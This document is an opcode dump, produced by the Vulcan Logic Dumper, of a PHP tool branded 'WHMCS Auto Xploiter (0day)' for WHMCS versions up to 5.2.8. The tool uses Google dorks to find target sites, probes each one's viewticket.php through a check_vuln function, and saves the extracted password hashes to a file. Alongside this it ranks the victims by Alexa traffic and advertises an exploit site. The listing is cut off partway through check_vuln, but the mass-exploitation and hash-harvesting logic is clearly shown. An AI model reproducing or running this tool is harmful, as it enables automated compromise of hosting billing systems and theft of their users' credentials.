Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 43) Position 1 = 15, Position 2 = 22
Branch analysis from position: 15
1 jumps found. (Code = 42) Position 1 = 23
Branch analysis from position: 23
2 jumps found. (Code = 43) Position 1 = 29, Position 2 = 125
Branch analysis from position: 29
1 jumps found. (Code = 42) Position 1 = 122
Branch analysis from position: 122
2 jumps found. (Code = 44) Position 1 = 124, Position 2 = 39
Branch analysis from position: 124
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 39
2 jumps found. (Code = 43) Position 1 = 48, Position 2 = 53
Branch analysis from position: 48
1 jumps found. (Code = 42) Position 1 = 124
Branch analysis from position: 124
Branch analysis from position: 53
1 jumps found. (Code = 42) Position 1 = 118
Branch analysis from position: 118
2 jumps found. (Code = 44) Position 1 = 121, Position 2 = 55
Branch analysis from position: 121
2 jumps found. (Code = 44) Position 1 = 124, Position 2 = 39
Branch analysis from position: 124
Branch analysis from position: 39
Branch analysis from position: 55
2 jumps found. (Code = 43) Position 1 = 69, Position 2 = 103
Branch analysis from position: 69
2 jumps found. (Code = 77) Position 1 = 71, Position 2 = 81
Branch analysis from position: 71
2 jumps found. (Code = 78) Position 1 = 72, Position 2 = 81
Branch analysis from position: 72
1 jumps found. (Code = 42) Position 1 = 71
Branch analysis from position: 71
Branch analysis from position: 81
1 jumps found. (Code = 42) Position 1 = 115
Branch analysis from position: 115
2 jumps found. (Code = 44) Position 1 = 121, Position 2 = 55
Branch analysis from position: 121
Branch analysis from position: 55
Branch analysis from position: 81
Branch analysis from position: 103
2 jumps found. (Code = 44) Position 1 = 121, Position 2 = 55
Branch analysis from position: 121
Branch analysis from position: 55
Branch analysis from position: 125
Branch analysis from position: 22
2 jumps found. (Code = 43) Position 1 = 29, Position 2 = 125
Branch analysis from position: 29
Branch analysis from position: 125
filename: /in/OQ1nP
function name: (null)
number of ops: 127
compiled vars: !0 = $file, !1 = $googlePage, !2 = $googleResult, !3 = $victim, !4 = $result, !5 = $alexa, !6 = $hashes, !7 = $record, !8 = $sep, !9 = $data
line #* E I O op fetch ext return operands
-------------------------------------------------------------------------------------
9 0 E > INIT_FCALL 'set_time_limit'
1 SEND_VAL 0
2 DO_ICALL
10 3 INIT_FCALL 'ini_set'
4 SEND_VAL 'memory_limit'
5 SEND_VAL '64M'
6 DO_ICALL
11 7 INIT_FCALL 'header'
8 SEND_VAL 'Content-Type%3A+text%2Fhtml%3B+charset%3DUTF-8'
9 DO_ICALL
75 10 ECHO '%3Chtml%3E%0A%3Chead%3E%0A%3Ctitle%3EWHMCS+Auto+Xploiter+-+by+g00n%3C%2Ftitle%3E%0A%3C%2Fhead%3E%0A%3Cbody+style%3D%22background-image%3A+url%28%27http%3A%2F%2Fi.imgur.com%2FzHNCk2e.gif%27%29%3B+background-repeat%3A+repeat%3B+background-position%3A+center%3B+background-attachment%3A+fixed%3B%22%3E%0A%0A%3CSTYLE%3E%0Atextarea%7Bbackground-color%3A%23105700%3Bcolor%3Alime%3Bfont-weight%3Abold%3Bfont-size%3A+20px%3Bfont-family%3A+Tahoma%3B+border%3A+1px+solid+%23000000%3B%7D%0Ainput%7BFONT-WEIGHT%3Anormal%3Bbackground-color%3A+%23105700%3Bfont-size%3A+15px%3Bfont-weight%3Abold%3Bcolor%3A+lime%3B+font-family%3A+Tahoma%3B+border%3A+1px+solid+%23666666%3Bheight%3A20%7D%0Abody+%7B%0Afont-family%3A+Tahoma%0A%7D%0Atr+%7B%0ABORDER%3A+dashed+1px+%23333%3B%0Acolor%3A+%23FFF%3B%0A%7D%0Atd+%7B%0ABORDER%3A+dashed+1px+%23333%3B%0Acolor%3A+%23FFF%3B%0A%7D%0A.table1+%7B%0ABORDER%3A+0px+Black%3B%0ABACKGROUND-COLOR%3A+Black%3B%0Acolor%3A+%23FFF%3B%0A%7D%0A.td1+%7B%0ABORDER%3A+0px%3B%0ABORDER-COLOR%3A+%23333333%3B%0Afont%3A+7pt+Verdana%3B%0Acolor%3A+Green%3B%0A%7D%0A.tr1+%7B%0ABORDER%3A+0px%3B%0ABORDER-COLOR%3A+%23333333%3B%0Acolor%3A+%23FFF%3B%0A%7D%0Atable+%7B%0ABORDER%3A+dashed+1px+%23333%3B%0ABORDER-COLOR%3A+%23333333%3B%0ABACKGROUND-COLOR%3A+Black%3B%0Acolor%3A+%23FFF%3B%0A%7D%0Ainput+%7B%0Aborder++++++++++++%3A+dashed+1px%3B%0Aborder-color++++++++%3A+%23333%3B%0ABACKGROUND-COLOR%3A+Black%3B%0Afont%3A+8pt+Verdana%3B%0Acolor%3A+Red%3B%0A%7D%0Aselect+%7B%0ABORDER-RIGHT%3A++Black+1px+solid%3B%0ABORDER-TOP%3A++++%23DF0000+1px+solid%3B%0ABORDER-LEFT%3A+++%23DF0000+1px+solid%3B%0ABORDER-BOTTOM%3A+Black+1px+solid%3B%0ABORDER-color%3A+%23FFF%3B%0ABACKGROUND-COLOR%3A+Black%3B%0Afont%3A+8pt+Verdana%3B%0Acolor%3A+Red%3B%0A%7D%0Asubmit+%7B%0ABORDER%3A++buttonhighlight+2px+outset%3B%0ABACKGROUND-COLOR%3A+Black%3B%0Awidth%3A+30%25%3B%0Acolor%3A+%23FFF%3B%0A%7D%0Atextarea+%7B%0Aborder++++++++++++%3A+dashed+1px+%23333%3B%0ABACKGROUND-COLOR%3A+Black%3B%0Afont%3A+Fixedsys+bold%3B%0Acolor%3A+%23999%3B%0A%7D%0ABODY+%7B%0A++++SCROLLBAR-FACE-COLOR%3A+Black%3B+SCROLLBAR-HIGHLIGHT-color%3A+%23FFF%3B+SCROLLBAR-SHADOW-color%3A+%23FFF%3B+SCROLLBAR-3DLIGHT-color%3A+%23FFF%3B+SCROLLBAR-ARROW-COLOR%3A+Black%3B+SCROLLBAR-TRACK-color%3A+%23FFF%3B+SCROLLBAR-DARKSHADOW-color%3A+%23FFF%0Amargin%3A+1px%3B%0Acolor%3A+Red%3B%0Abackground-color%3A+Black%3B%0A%7D%0A.main+%7B%0Amargin++++++++++++%3A+-287px+0px+0px+-490px%3B%0ABORDER%3A+dashed+1px+%23333%3B%0ABORDER-COLOR%3A+%23333333%3B%0A%7D%0A.tt+%7B%0Abackground-color%3A+Black%3B%0A%7D%0A%0AA%3Alink+%7B%0A++++COLOR%3A+White%3B+TEXT-DECORATION%3A+none%0A%7D%0AA%3Avisited+%7B%0A++++COLOR%3A+White%3B+TEXT-DECORATION%3A+none%0A%7D%0AA%3Ahover+%7B%0A++++color%3A+Red%3B+TEXT-DECORATION%3A+none%0A%7D%0AA%3Aactive+%7B%0A++++color%3A+Red%3B+TEXT-DECORATION%3A+none%0A%7D%0A%0A%23result%7Bmargin%3A10px%3B%7D%0A%23result+span%7Bdisplay%3Ablock%3B%7D%0A%23result+.Y%7Bbackground-color%3Agreen%3B%7D%0A%23result+.X%7Bbackground-color%3Ared%3B%7D%0A%3C%2FSTYLE%3E%0A%3Cscript+language%3D%5C%27javascript%5C%27%3E%0Afunction+hide_div%28id%29%0A%7B%0A++document.getElementById%28id%29.style.display+%3D+%5C%27none%5C%27%3B%0A++document.cookie%3Did%2B%5C%27%3D0%3B%5C%27%3B%0A%7D%0Afunction+show_div%28id%29%0A%7B%0A++document.getElementById%28id%29.style.display+%3D+%5C%27block%5C%27%3B%0A++document.cookie%3Did%2B%5C%27%3D1%3B%5C%27%3B%0A%7D%0Afunction+change_divst%28id%29%0A%7B%0A++if+%28document.getElementById%28id%29.style.display+%3D%3D+%5C%27none%5C%27%29%0A++++show_div%28id%29%3B%0A++else%0A++++hide_div%28id%29%3B%0A%7D%0A%3C%2Fscript%3E%0A%3C%2Ftd%3E%3C%2Ftable%3E%3C%2Ftr%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3Clink+rel%3D%22stylesheet%22+type%3D%22text%2Fcss%22+href%3D%22http%3A%2F%2Ffonts.googleapis.com%2Fcss%3Ffamily%3DAudiowide%22%3E%0A++++%3Cstyle%3E%0A++++++body+%7B%0A++++++++font-family%3A+%27Audiowide%27%2C+serif%3B%0A++++++++font-size%3A+30px%3B%0A++++++++%0A++++++%7D%0A++++%3C%2Fstyle%3E%0A++%3C%2Fhead%3E%0A%0A++%3Cbody+onLoad%3D%22type_text%28%29%22+%3B+bgColor%3D%23000000+text%3D%2300FFFF+background%3D%22Fashion+fuchsia%22%3E%0A++++%3Ccenter%3E%0A%3Cfont+face%3D%22Audiowide%22+color%3D%22red%22%3EWHMCS+Auto+Xploiter+%3Cfont+color%3D%22green%22%3E%280day%29%3C%2Ffont%3E%0A%3Cbr%3E%0A%3Cfont+color%3D%22white%22+size%3D%224%22%3E%5BFor+WHMCS+ver.+%3C%3D+%3C%2Ffont%3E%3Cfont+color%3D%22green%22+size%3D%224%22%3E5.2.8%3C%2Ffont%3E%3Cfont+color%3D%22white%22+size%3D%224%22%3E%5D%3C%2Ffont%3E%0A%3C%2Ffont%3E%0A%3Cbr%3E%3Cbr%3E%0A%0A%3Ctable+border%3D1+bordercolor%3Dred%3E%0A%3Ctr%3E%0A%3Ctd+width%3D%22700%22%3E%0A%3Cbr+%2F%3E%0A%3Ccenter%3E%0A++++%3Cform+method%3D%22post%22%3E%0A++++++++Google+Dork%3A+%26nbsp%3B%26nbsp%3B%0A++++++++%3Cinput+type%3D%22text%22+id%3D%22dork%22+size%3D%2230%22+name%3D%22dork%22+value%3D%22'
226 11 FETCH_IS ~13 '_POST'
12 FETCH_DIM_IS ~14 ~13, 'dork'
13 ISSET_ISEMPTY_DIM_OBJ 0 ~14, 0
14 > JMPZ ~15, ->22
15 > INIT_FCALL 'htmlentities'
16 FETCH_R global ~16 '_POST'
17 FETCH_DIM_R ~17 ~16, 'dork'
18 SEND_VAL ~17
19 DO_ICALL $18
20 QM_ASSIGN ~19 $18
21 > JMP ->23
22 > QM_ASSIGN ~19 'inurl%3Asubmitticket.php'
23 > ECHO ~19
24 ECHO '%22+%2F%3E%0A++++++++%26nbsp%3B%26nbsp%3B%3Cinput+type%3D%22submit%22+value%3D%22Xploit%21%22+id%3D%22button%22%2F%3E%0A++++%3C%2Fform%3E%0A'
230 25 FETCH_IS ~20 '_POST'
26 FETCH_DIM_IS ~21 ~20, 'dork'
27 ISSET_ISEMPTY_DIM_OBJ 0 ~21, 0
28 > JMPZ ~22, ->125
231 29 > INIT_FCALL 'fopen'
30 SEND_VAL 'WMCS-Hashes.txt'
31 SEND_VAL 'a'
32 DO_ICALL $23
33 ASSIGN !0, $23
232 34 ECHO '%3Cbr+%2F%3E%3Cdiv+id%3D%22result%22%3E%3Cb%3EScanning+has+been+started...+Good+luck%21+%3B%29%3C%2Fb%3E%3Cbr%3E%3Cbr%3E'
233 35 INIT_FCALL 'letitby'
36 DO_FCALL 0
234 37 ASSIGN !1, 1
38 > JMP ->122
235 39 > INIT_FCALL 'google_that'
40 FETCH_R global ~27 '_POST'
41 FETCH_DIM_R ~28 ~27, 'dork'
42 SEND_VAL ~28
43 SEND_VAR !1
44 DO_FCALL 0 $29
45 ASSIGN !2, $29
236 46 BOOL_NOT ~31 !2
47 > JMPZ ~31, ->53
237 48 > ECHO 'Finished+scanning.'
238 49 INIT_FCALL 'fclose'
50 SEND_VAR !0
51 DO_ICALL
239 52 > JMP ->124
242 53 > ASSIGN !3, 0
54 > JMP ->118
243 55 > INIT_FCALL 'check_vuln'
56 FETCH_DIM_R ~34 !2, !3
57 FETCH_DIM_R ~35 ~34, 'unescapedUrl'
58 SEND_VAL ~35
59 DO_FCALL 0 $36
60 ASSIGN !4, $36
244 61 INIT_FCALL 'getalexa'
62 FETCH_DIM_R ~38 !2, !3
63 FETCH_DIM_R ~39 ~38, 'unescapedUrl'
64 SEND_VAL ~39
65 DO_FCALL 0 $40
66 ASSIGN !5, $40
245 67 IS_NOT_EQUAL !4, 'Fail%21'
68 > JMPZ ~42, ->103
246 69 > ASSIGN !6, ''
247 70 > FE_RESET_R $44 !4, ->81
71 > > FE_FETCH_R $44, !7, ->81
248 72 > INIT_FCALL 'str_replace'
73 SEND_VAL '%3A%3A%3A%3A%3A'
74 SEND_VAL ''
75 SEND_VAR !7
76 DO_ICALL $45
77 CONCAT ~46 !6, $45
78 CONCAT ~47 ~46, '%0A'
79 ASSIGN !6, ~47
247 80 > JMP ->71
81 > FE_FREE $44
250 82 ASSIGN !8, '%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%0A'
251 83 FETCH_DIM_R ~50 !2, !3
84 FETCH_DIM_R ~51 ~50, 'unescapedUrl'
85 CONCAT ~52 !8, ~51
86 CONCAT ~53 ~52, '+-+Alexa%3A+'
87 CONCAT ~54 ~53, !5
88 CONCAT ~55 ~54, '%0A'
89 CONCAT ~56 ~55, !8
90 CONCAT ~57 ~56, !6
91 CONCAT ~58 ~57, '%0A'
92 ASSIGN !9, ~58
252 93 INIT_FCALL 'fwrite'
94 SEND_VAR !0
95 SEND_VAR !9
96 DO_ICALL
253 97 ECHO '%3Cbr+%2F%3E%3Cfont+color%3D%22green%22%3ESuccessfully+Xploited...%3C%2Ffont%3E'
254 98 ECHO '%3Cspan+class%3D%22Y%22%3E'
255 99 CONCAT ~61 '%3Cpre%3E', !9
100 CONCAT ~62 ~61, '%3C%2Fpre%3E%3C%2Fspan%3E%3Cbr+%2F%3E'
101 ECHO ~62
102 > JMP ->115
259 103 > ECHO '%3Cspan+class%3D%22X%22%3E'
260 104 ROPE_INIT 5 ~68 '%3Ca+href%3D%22'
105 FETCH_DIM_R ~63 !2, !3
106 FETCH_DIM_R ~64 ~63, 'unescapedUrl'
107 ROPE_ADD 1 ~68 ~68, ~64
108 ROPE_ADD 2 ~68 ~68, '%22+target%3D%27_blank%27%3E'
109 FETCH_DIM_R ~65 !2, !3
110 FETCH_DIM_R ~66 ~65, 'titleNoFormatting'
111 ROPE_ADD 3 ~68 ~68, ~66
112 ROPE_END 4 ~67 ~68, '%3C%2Fa%3E+-+%3Cfont+color%3D%22black%22%3EFailed%21%3C%2Ffont%3E'
113 ECHO ~67
261 114 ECHO '%3C%2Fspan%3E%0A%3Cbr+%2F%3E'
263 115 > INIT_FCALL 'letitby'
116 DO_FCALL 0
242 117 PRE_INC !3
118 > COUNT ~73 !2
119 IS_SMALLER !3, ~73
120 > JMPNZ ~74, ->55
234 121 > PRE_INC !1
122 > IS_SMALLER_OR_EQUAL !1, 50
123 > JMPNZ ~76, ->39
266 124 > ECHO '%3C%2Fdiv%3E'
269 125 > ECHO '%3C%2Fcenter%3E%0A%3C%2Ftd%3E%0A%3C%2Ftable%3E%0A%3Cbr+%2F%3E%3Cbr+%2F%3E%0A%3Cfont+face%3D%22Audiowide%22+color%3D%22red%22+size%3D%222%22%3E%0ACoded+by%3A+%3Cfont+color%3D%22white%22%3Eg00n%3C%2Ffont%3E+%3Cfont+color%3D%22white%22%3E%7C%3C%2Ffont%3E+Skype%3A+%3Cfont+color%3D%22white%22%3E%3Ca+href%3D%22Skype%3At3hg00n%22%3Et3hg00n%3C%2Fa%3E%3C%2Ffont%3E%3Cbr+%2F%3E%3Cbr+%2F%3E%0A%3Cbr+%3E+%3Cfont+color%3D%22green%22%3EFor+more+tools%2Fscripts%2Fexploits%2Fetc.%3C%2Ffont%3E%0A%3Cbr+%2F%3Evisit+%3Ca+href%3D%22http%3A%2F%2Fxploiter.net%22+target%3D%22_blank%22+style%3D%22text-decoration%3A+none%3B%22%3Ewww.Xploiter.net%3C%2Fa%3E%0A%3C%2Ffont%3E%0A%0A%3C%2Fcenter%3E%0A%3C%2Fbody%3E%0A%3C%2Fhtml%3E'
281 126 > RETURN 1
Function letitby:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename: /in/OQ1nP
function name: letItBy
number of ops: 5
compiled vars: none
line #* E I O op fetch ext return operands
-------------------------------------------------------------------------------------
12 0 E > INIT_FCALL 'ob_flush'
1 DO_ICALL
2 INIT_FCALL 'flush'
3 DO_ICALL
4 > RETURN null
End of function letitby
Function getalexa:
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 43) Position 1 = 10, Position 2 = 16
Branch analysis from position: 10
1 jumps found. (Code = 42) Position 1 = 17
Branch analysis from position: 17
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 16
1 jumps found. (Code = 62) Position 1 = -2
filename: /in/OQ1nP
function name: getAlexa
number of ops: 19
compiled vars: !0 = $url, !1 = $xml, !2 = $rank1, !3 = $rank
line #* E I O op fetch ext return operands
-------------------------------------------------------------------------------------
13 0 E > RECV !0
15 1 INIT_FCALL 'simplexml_load_file'
2 CONCAT ~4 'http%3A%2F%2Fdata.alexa.com%2Fdata%3Fcli%3D10%26dat%3Dsnbamz%26url%3D', !0
3 SEND_VAL ~4
4 DO_ICALL $5
5 ASSIGN !1, $5
16 6 FETCH_OBJ_R ~7 !1, 'SD'
7 FETCH_DIM_R ~8 ~7, 1
8 ASSIGN !2, ~8
17 9 > JMPZ !2, ->16
18 10 > FETCH_OBJ_R ~10 !2, 'POPULARITY'
11 INIT_METHOD_CALL ~10, 'attributes'
12 DO_FCALL 0 $11
13 FETCH_OBJ_R ~12 $11, 'TEXT'
14 ASSIGN !3, ~12
15 > JMP ->17
20 16 > ASSIGN !3, 0
21 17 > > RETURN !3
22 18* > RETURN null
End of function getalexa
Function google_that:
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 43) Position 1 = 26, Position 2 = 41
Branch analysis from position: 26
2 jumps found. (Code = 43) Position 1 = 29, Position 2 = 30
Branch analysis from position: 29
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 30
2 jumps found. (Code = 43) Position 1 = 35, Position 2 = 37
Branch analysis from position: 35
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 37
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 41
1 jumps found. (Code = 79) Position 1 = -2
filename: /in/OQ1nP
function name: google_that
number of ops: 44
compiled vars: !0 = $query, !1 = $page, !2 = $resultPerPage, !3 = $start, !4 = $url, !5 = $resultFromGoogle
line #* E I O op fetch ext return operands
-------------------------------------------------------------------------------------
24 0 E > RECV !0
1 RECV_INIT !1 1
26 2 ASSIGN !2, 8
27 3 MUL ~7 !1, !2
4 ASSIGN !3, ~7
28 5 ROPE_INIT 5 ~10 'http%3A%2F%2Fajax.googleapis.com%2Fajax%2Fservices%2Fsearch%2Fweb%3Fv%3D1.0%26hl%3Diw%26rsz%3D'
6 ROPE_ADD 1 ~10 ~10, !2
7 ROPE_ADD 2 ~10 ~10, '%26start%3D'
8 ROPE_ADD 3 ~10 ~10, !3
9 ROPE_END 4 ~9 ~10, '%26q%3D'
10 INIT_FCALL 'urlencode'
11 SEND_VAR !0
12 DO_ICALL $13
13 CONCAT ~14 ~9, $13
14 ASSIGN !4, ~14
29 15 INIT_FCALL 'json_decode'
16 INIT_FCALL_BY_NAME 'http_get'
17 SEND_VAR_EX !4
18 SEND_VAL_EX <true>
19 DO_FCALL 0 $16
20 SEND_VAR $16
21 SEND_VAL <true>
22 DO_ICALL $17
23 ASSIGN !5, $17
30 24 ISSET_ISEMPTY_DIM_OBJ 0 !5, 'responseStatus'
25 > JMPZ ~19, ->41
31 26 > FETCH_DIM_R ~20 !5, 'responseStatus'
27 IS_NOT_EQUAL ~20, '200'
28 > JMPZ ~21, ->30
29 > > RETURN <false>
32 30 > FETCH_DIM_R ~22 !5, 'responseData'
31 FETCH_DIM_R ~23 ~22, 'results'
32 COUNT ~24 ~23
33 IS_EQUAL ~24, 0
34 > JMPZ ~25, ->37
35 > > RETURN <false>
36* JMP ->40
33 37 > FETCH_DIM_R ~26 !5, 'responseData'
38 FETCH_DIM_R ~27 ~26, 'results'
39 > RETURN ~27
40* JMP ->43
36 41 > CONCAT ~28 'The+function+%3Cb%3Egoogle_that%3C%2Fb%3E+Kill+me+%3A%28+%3Cbr%3E', !4
42 > EXIT ~28
37 43* > RETURN null
End of function google_that
Function http_get:
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 43) Position 1 = 4, Position 2 = 7
Branch analysis from position: 4
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 7
filename: /in/OQ1nP
function name: http_get
number of ops: 42
compiled vars: !0 = $url, !1 = $safemode, !2 = $im
line #* E I O op fetch ext return operands
-------------------------------------------------------------------------------------
39 0 E > RECV !0
1 RECV_INIT !1 <false>
40 2 TYPE_CHECK 8 !1
3 > JMPZ ~3, ->7
4 > INIT_FCALL 'sleep'
5 SEND_VAL 1
6 DO_ICALL
41 7 > INIT_FCALL_BY_NAME 'curl_init'
8 SEND_VAR_EX !0
9 DO_FCALL 0 $5
10 ASSIGN !2, $5
42 11 INIT_FCALL_BY_NAME 'curl_setopt'
12 SEND_VAR_EX !2
13 FETCH_CONSTANT ~7 'CURLOPT_RETURNTRANSFER'
14 SEND_VAL_EX ~7
15 SEND_VAL_EX 1
16 DO_FCALL 0
43 17 INIT_FCALL_BY_NAME 'curl_setopt'
18 SEND_VAR_EX !2
19 FETCH_CONSTANT ~9 'CURLOPT_CONNECTTIMEOUT'
20 SEND_VAL_EX ~9
21 SEND_VAL_EX 10
22 DO_FCALL 0
44 23 INIT_FCALL_BY_NAME 'curl_setopt'
24 SEND_VAR_EX !2
25 FETCH_CONSTANT ~11 'CURLOPT_FOLLOWLOCATION'
26 SEND_VAL_EX ~11
27 SEND_VAL_EX 1
28 DO_FCALL 0
45 29 INIT_FCALL_BY_NAME 'curl_setopt'
30 SEND_VAR_EX !2
31 FETCH_CONSTANT ~13 'CURLOPT_HEADER'
32 SEND_VAL_EX ~13
33 SEND_VAL_EX 0
34 DO_FCALL 0
46 35 INIT_FCALL_BY_NAME 'curl_exec'
36 SEND_VAR_EX !2
37 DO_FCALL 0 $15
38 > RETURN $15
47 39* INIT_FCALL_BY_NAME 'curl_close'
40* DO_FCALL 0
48 41* > RETURN null
End of function http_get
Function check_vuln:
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 43) Position 1 = 19, Position 2 = 71
Branch analysis from position: 19
2 jumps found. (Code = 43) Position 1 = 66, Position 2 = 69
Branch analysis from position: 66
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 69
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 71
1 jumps found. (Code = 62) Position 1 = -2
filename: /in/OQ1nP
function name: check_vuln
number of ops: 73
compiled vars: !0 = $url, !1 = $post, !2 = $curl_connection, !3 = $source, !4 = $infoz
line #* E I O op fetch ext return operands
-------------------------------------------------------------------------------------
50 0 E > RECV !0
51 1 INIT_FCALL 'dirname'
2 SEND_VAR !0
3 DO_ICALL $5
4 CONCAT ~6 $5, '%2Fviewticket.php'
5 ASSIGN Generated using Vulcan Logic Dumper, using php 8.0.0